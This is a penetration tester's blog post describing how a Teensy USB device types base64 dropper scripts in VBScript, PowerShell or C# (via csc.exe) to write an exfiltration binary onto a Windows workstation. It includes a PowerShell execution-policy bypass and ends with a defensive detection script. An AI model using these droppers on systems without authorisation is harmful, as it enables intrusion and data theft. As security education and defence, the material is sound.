Tuesday, July 30, 2013

Binary deployment with VBScript, PowerShell or .Net csc.exe compiler

Preface

About six months ago I had an engagement where my task was to exfiltrate data from a workstation on some sort of storage media. Given that I already knew about such techniques for Arduino [1] and Teensy [2], I thought it would be a great opportunity to try them out in real life too.

As a first step I had to bypass a host port protection solution, which was not easy, but I managed to find a way to defeat it. After that, I was good to go to use a Teensy to deploy the exfiltrator binary from [2].

And this is where all the troubles started. In the original blog post [2], the Teensy would type out the exfil.vbs VBScript that has the exfiltrator binary in base64 encoded format. But when I tried to execute the VBScript, I got the following error message:

Script: C:\...\exfil.vbs
Line:   4
Char:   1
Error:  Error Parsing '<base64_stuff_here>' as bin.base64 datatype.

Code :  80004005
Source: msxml3.dll

It turned out that the Windows XP system where I tried to do the exfiltration was unpatched, having a bug in msxml3.dll which prevented me from converting the base64 encoded payload into binary. :D (seems like there are patches you shouldn't apply...)

But I did not panic, because very thoughtfully, the machine had PowerShell installed (I know, right? :) ), so I re-wrote the VBScript in PowerShell, but I was stupid, and I did not think (but probably I should have) that PowerShell is using the very same freaking msxml3.dll for base64 decoding...

Still no need to panic, because whenever a Windows box has .Net Framework installed (and I think most of them do), by default it is shipped with a nice command line compiler called csc.exe so you can write C# code to convert a base64 payload into binary. :)

Of course, normally you need just one of these methods, but as you can see, sometimes only one of them will work, and it's handy to know each of them.

Binary deployment

VBScript


So the original exfil.vbs script is this:

Dim a,b
Set a=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
a.dataType="bin.base64"
a.text="<PASTE_BASE64_ENCODED_PAYLOAD_HERE>"
Set b=CreateObject("ADODB.Stream")
b.Type=1
b.Open
b.Write a.nodeTypedValue
b.SaveToFile "payload.exe",2

Just execute it, and you will have your payload.exe next to the script.

PowerShell


The second version is in PowerShell:

Add-Type -an System
Add-Type -an System.Windows.Forms 
$e = "<PASTE_BASE64_ENCODED_PAYLOAD_HERE>"
$c = [System.Convert]::FromBase64String($e)
[System.IO.File]::WriteAllBytes("$(get-location)\payload.exe", $c)

To execute the script, you can use any PowerShell script execution restriction bypass method you want. My favorite one is this:

PS C:\temp> gc .\script.ps1 | iex

Where the cmdlets are:
  • gc is Get-Content to read the contents of the PowerShell script
  • iex is Invoke-Expression to execute the script line-by-line (so basically execute the script :) )

.Net C# compiler


Last but not least, you can use csc.exe that is shipped along with .NET Framework.

The following C# needs a text file with the base64 encoded payload in it, but you can modify it to have it in a variable. I got this from a colleague and I was too lazy to change it, so I just put the base64 payload into a comment and copied it manually into a file.

You can also make the variable names shorter, so it takes less time for the Teensy to type in, but I think the most time-consuming part is typing in the base64 payload.

using System;
using System.IO;

// <PASTE_BASE64_ENCODED_PAYLOAD_HERE_AND_PLACE_IT_INTO_payload.txt>

class Base64Decoder
{
   static void Main(string[] args)
   {
      StreamReader reader = new StreamReader(args[0]);
      string line = reader.ReadLine();
      reader.Close();

      byte[] toDecodeByte = Convert.FromBase64String(line);

      FileStream outfileStream = new FileStream(args[1], FileMode.Create);
      outfileStream.Write(toDecodeByte, 0, toDecodeByte.Length);
      outfileStream.Close();
   }
}

Compile it, and convert the payload:

C:\temp>%Systemroot%\Microsoft.NET\Framework\v3.5\csc /out:C:\temp\d64.exe c:\temp\d64.cs
Microsoft (R) Visual C# 2008 Compiler version 3.5.30729.5420
for Microsoft (R) .NET Framework version 3.5
Copyright (C) Microsoft Corporation. All rights reserved.

C:\temp>d64.exe payload.txt payload.exe

And that's all! :) Three easy ways to deploy a binary on a Windows box!
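Seen from the defender's side, all three methods leave the same artifact behind: a text file holding a long base64 run that decodes to a PE image, with or without a decode call (bin.base64 or FromBase64String) next to it. The following triage sketch is an added example, not code from the original post; the sample contents are constructed and inert, and report.ps1, notes.txt and the 64-character threshold are assumptions.

```python
import base64
import re

# Decode primitives used by the three droppers on this page.
PRIMITIVES = {
    "vbscript-msxml": re.compile(r"bin\.base64", re.I),
    "dotnet-frombase64": re.compile(r"FromBase64String", re.I),
}
# Long unbroken base64 run; the 64-character floor is an assumed threshold.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")

# Constructed, inert sample data: "MZ" magic plus zero bytes, not a real executable.
FAKE_PE_B64 = base64.b64encode(b"MZ\x90\x00" + bytes(62)).decode()
SAMPLES = {
    "exfil.vbs": 'a.dataType="bin.base64"\na.text="%s"' % FAKE_PE_B64,
    "payload.txt": FAKE_PE_B64,
    "report.ps1": "$c = [System.Convert]::FromBase64String($cfg)",
    "notes.txt": "nothing to see",
}


def embedded_pe_offsets(text):
    """Offsets of base64 runs whose decoded bytes start with the PE 'MZ' magic."""
    hits = []
    for m in B64_RUN.finditer(text):
        head = base64.b64decode(m.group(0)[:8])  # 8 chars always decode to 6 bytes
        if head.startswith(b"MZ"):
            hits.append(m.start())
    return hits


def triage(name, text):
    """Say which decode primitive a file uses and whether it carries a PE image."""
    prims = sorted(k for k, rx in PRIMITIVES.items() if rx.search(text))
    pe = embedded_pe_offsets(text)
    if pe and prims:
        verdict = "dropper"  # decoder and payload in the same file
    elif pe:
        verdict = "staged-payload"  # e.g. payload.txt fed to a separate decoder
    elif prims:
        verdict = "decoder-only"  # has benign uses; correlate with nearby files
    else:
        verdict = "clean"
    return {"file": name, "verdict": verdict, "primitives": prims, "pe_offsets": pe}


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(triage(name, text))
```

A run that is glued to other base64-alphabet characters (for example a payload pasted directly after `//` with no space) will not decode to MZ at its start, so pair this with process-creation logging for csc.exe compiling sources out of user-writable directories.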

Hardware

A quick update, since I forgot to write about the HW I used. It's plain and simple actually, just a Teensy 2.0 with a Teensy SD Adaptor, connected to the PC with a USB A type to USB MINI-B type cable.

Every detail on connecting a Teensy with the SD Adaptor can be found in my "Making a USB flash drive HW Trojan" blog post, but just as a quick recap, here is the picture for the wiring:


References

[1] Leaking data using DIY USB HID device

[2] Data exfiltration using a USB keyboard
